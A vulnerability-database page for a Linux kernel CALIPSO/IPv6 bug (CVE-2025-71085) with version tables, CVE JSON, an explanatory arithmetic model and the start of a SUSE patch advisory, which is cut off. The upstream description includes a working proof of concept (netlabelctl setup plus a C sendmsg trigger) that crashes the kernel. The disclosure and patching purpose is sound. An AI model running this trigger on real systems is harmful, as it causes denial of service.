CVE-2025-71085 (GCVE-0-2025-71085)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-05-11 21:54
Title
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Summary
In the Linux kernel, the following vulnerability has been resolved:

ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()

There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.

Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.

PoC:

Using `netlabelctl` tool:

```
netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7
```

Then run the following PoC:

```c
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

// setup msghdr
int cmsg_size = 2;
int cmsg_len = 0x60;
struct msghdr msg;
struct sockaddr_in6 dest_addr;
struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
                sizeof(struct cmsghdr) + cmsg_len);
msg.msg_name = &dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = NULL;
msg.msg_iovlen = 0;
msg.msg_control = cmsg;
msg.msg_controllen = cmsg_len;
msg.msg_flags = 0;

// setup sockaddr
dest_addr.sin6_family = AF_INET6;
dest_addr.sin6_port = htons(31337);
dest_addr.sin6_flowinfo = htonl(31337);
dest_addr.sin6_addr = in6addr_loopback;
dest_addr.sin6_scope_id = 31337;

// setup cmsghdr
cmsg->cmsg_len = cmsg_len;
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_HOPOPTS;
char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80

sendmsg(fd, &msg, 0);
```
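The signed/unsigned arithmetic behind the root cause, as an added userspace model (not kernel code and not part of the original record): it reproduces the unsigned check, the implicit cast to `int` and the rounding to `NET_SKB_PAD` that the description attributes to `__skb_cow()`, next to a caller that only ever asks to grow headroom. The function names, the `NET_SKB_PAD` value of 64 and the sample headroom and `len_delta` numbers are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed pad size for this model; the kernel derives NET_SKB_PAD from the
 * cache line size. */
#define NET_SKB_PAD 64

/* Reinterpret a 32-bit unsigned value as signed, i.e. what the implicit
 * unsigned -> int conversion yields on two's-complement targets. */
static int32_t as_s32(uint32_t v)
{
    return v <= INT32_MAX ? (int32_t)v : (int32_t)((int64_t)v - 4294967296LL);
}

/* Round up to a multiple of NET_SKB_PAD. 64-bit math keeps the model itself
 * free of signed overflow. */
static int64_t align_pad(int32_t x)
{
    return ((int64_t)x + (NET_SKB_PAD - 1)) & ~(int64_t)(NET_SKB_PAD - 1);
}

/* Model of the arithmetic described for __skb_cow(): returns the nhead value
 * that would be handed to pskb_expand_head(). */
static int64_t model_cow_nhead(uint32_t headroom, uint32_t cur_headroom)
{
    int32_t delta = 0;

    if (headroom > cur_headroom)                  /* unsigned comparison */
        delta = as_s32(headroom - cur_headroom);  /* stored in a signed int */
    return align_pad(delta);
}

/* pskb_expand_head() asserts BUG_ON(nhead < 0). */
static int would_bug(int64_t nhead)
{
    return nhead < 0;
}

/* Caller before the fix: the request is current headroom plus a signed
 * len_delta, so a shrink larger than the headroom wraps above INT_MAX. */
static uint32_t request_unguarded(uint32_t cur_headroom, int32_t len_delta)
{
    return cur_headroom + (uint32_t)len_delta;
}

/* Caller that only uses the request to grow headroom (hypothetical guard
 * illustrating the described fix, not the actual patch). */
static uint32_t request_grow_only(uint32_t cur_headroom, int32_t len_delta)
{
    return len_delta > 0 ? cur_headroom + (uint32_t)len_delta : cur_headroom;
}

int main(void)
{
    /* Constructed sample values: {current headroom, len_delta}. */
    static const struct { uint32_t cur; int32_t len_delta; } cases[] = {
        { 16, -80 },   /* shrink past headroom, delta <= -NET_SKB_PAD */
        { 16, -40 },   /* shrink past headroom, delta rounds up to 0  */
        { 100, -80 },  /* shrink that fits in the existing headroom   */
        { 16, 24 },    /* ordinary growth                             */
    };

    for (size_t i = 0; i < sizeof(cases) / sizeof(cases[0]); i++) {
        uint32_t cur = cases[i].cur;
        int32_t d = cases[i].len_delta;
        int64_t before = model_cow_nhead(request_unguarded(cur, d), cur);
        int64_t after = model_cow_nhead(request_grow_only(cur, d), cur);

        printf("cur=%u len_delta=%d  unguarded: req=0x%08x nhead=%lld%s"
               "  grow-only: nhead=%lld%s\n",
               (unsigned)cur, (int)d, (unsigned)request_unguarded(cur, d),
               (long long)before, would_bug(before) ? " (BUG_ON)" : "",
               (long long)after, would_bug(after) ? " (BUG_ON)" : "");
    }
    return 0;
}
```

Only the first case reaches the assertion: a negative delta larger than `-NET_SKB_PAD` rounds up to 0, which is why the description adds the `delta <= -NET_SKB_PAD` condition.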
Severity
No CVSS data available.
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux | Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 86f365897068d09418488165a68b23cb5baa37f2 (git); Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 6b7522424529556c9cbc15e15e7bd4eeae310910 (git); Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 2bb759062efa188ea5d07242a43e5aa5464bbae1 (git); Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < c53aa6a5086f03f19564096ee084a202a8c738c0 (git); Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < bf3709738d8a8cc6fa275773170c5c29511a0b24 (git); Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 73744ad5696dce0e0f43872aba8de6a83d6ad570 (git); Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 58fc7342b529803d3c221101102fe913df7adb83 (git) | |
| Linux | Linux | Affected: 4.8; Unaffected: 0 , < 4.8 (semver); Unaffected: 5.10.248 , ≤ 5.10.* (semver); Unaffected: 5.15.198 , ≤ 5.15.* (semver); Unaffected: 6.1.160 , ≤ 6.1.* (semver); Unaffected: 6.6.120 , ≤ 6.6.* (semver); Unaffected: 6.12.64 , ≤ 6.12.* (semver); Unaffected: 6.18.4 , ≤ 6.18.* (semver); Unaffected: 6.19 , ≤ * (original_commit_for_fix) | |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "86f365897068d09418488165a68b23cb5baa37f2",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "6b7522424529556c9cbc15e15e7bd4eeae310910",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "2bb759062efa188ea5d07242a43e5aa5464bbae1",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "c53aa6a5086f03f19564096ee084a202a8c738c0",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "bf3709738d8a8cc6fa275773170c5c29511a0b24",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "73744ad5696dce0e0f43872aba8de6a83d6ad570",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "58fc7342b529803d3c221101102fe913df7adb83",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);"
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T21:54:27.272Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2"
},
{
"url": "https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910"
},
{
"url": "https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1"
},
{
"url": "https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0"
},
{
"url": "https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24"
},
{
"url": "https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570"
},
{
"url": "https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83"
}
],
"title": "ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71085",
"datePublished": "2026-01-13T15:34:48.324Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-05-11T21:54:27.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-71085",
"date": "2026-05-27",
"epss": "0.00033",
"percentile": "0.09872"
}
}
}
SUSE-SU-2026:1088-1
Vulnerability from csaf_suse - Published: 2026-03-26 17:03 - Updated: 2026-03-26 17:03
Summary
Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 4.12.14-122.255 fixes various security issues
The following security issues were fixed:
- CVE-2022-50423: ACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage() (bsc#1250785).
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2022-50756: nvme-pci: fix mempool alloc size (bsc#1256217).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1088,SUSE-SLE-Live-Patching-12-SP5-2026-1088
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x | — | Vendor Fix | |
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 | — | Vendor Fix | |
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 4.12.14-122.255 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50423: ACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage() (bsc#1250785).\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2022-50756: nvme-pci: fix mempool alloc size (bsc#1256217).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1088,SUSE-SLE-Live-Patching-12-SP5-2026-1088",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1088-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1088-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261088-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1088-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024961.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1250785",
"url": "https://bugzilla.suse.com/1250785"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256217",
"url": "https://bugzilla.suse.com/1256217"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50423 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50423/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50756 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50756/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 67 for SUSE Linux Enterprise 12 SP5)",
"tracking": {
"current_release_date": "2026-03-26T17:03:58Z",
"generator": {
"date": "2026-03-26T17:03:58Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1088-1",
"initial_release_date": "2026-03-26T17:03:58Z",
"revision_history": [
{
"date": "2026-03-26T17:03:58Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"product": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"product_id": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"product": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"product_id": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64",
"product": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64",
"product_id": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-live-patching:12:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le"
},
"product_reference": "kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x"
},
"product_reference": "kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
},
"product_reference": "kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50423",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50423"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage()\n\nThere is an use-after-free reported by KASAN:\n\n BUG: KASAN: use-after-free in acpi_ut_remove_reference+0x3b/0x82\n Read of size 1 at addr ffff888112afc460 by task modprobe/2111\n CPU: 0 PID: 2111 Comm: modprobe Not tainted 6.1.0-rc7-dirty\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\n Call Trace:\n \u003cTASK\u003e\n kasan_report+0xae/0xe0\n acpi_ut_remove_reference+0x3b/0x82\n acpi_ut_copy_iobject_to_iobject+0x3be/0x3d5\n acpi_ds_store_object_to_local+0x15d/0x3a0\n acpi_ex_store+0x78d/0x7fd\n acpi_ex_opcode_1A_1T_1R+0xbe4/0xf9b\n acpi_ps_parse_aml+0x217/0x8d5\n ...\n \u003c/TASK\u003e\n\nThe root cause of the problem is that the acpi_operand_object\nis freed when acpi_ut_walk_package_tree() fails in\nacpi_ut_copy_ipackage_to_ipackage(), lead to repeated release in\nacpi_ut_copy_iobject_to_iobject(). The problem was introduced\nby \"8aa5e56eeb61\" commit, this commit is to fix memory leak in\nacpi_ut_copy_iobject_to_iobject(), repeatedly adding remove\noperation, lead to \"acpi_operand_object\" used after free.\n\nFix it by removing acpi_ut_remove_reference() in\nacpi_ut_copy_ipackage_to_ipackage(). acpi_ut_copy_ipackage_to_ipackage()\nis called to copy an internal package object into another internal\npackage object, when it fails, the memory of acpi_operand_object\nshould be freed by the caller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50423",
"url": "https://www.suse.com/security/cve/CVE-2022-50423"
},
{
"category": "external",
"summary": "SUSE Bug 1250784 for CVE-2022-50423",
"url": "https://bugzilla.suse.com/1250784"
},
{
"category": "external",
"summary": "SUSE Bug 1250785 for CVE-2022-50423",
"url": "https://bugzilla.suse.com/1250785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2022-50423"
},
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 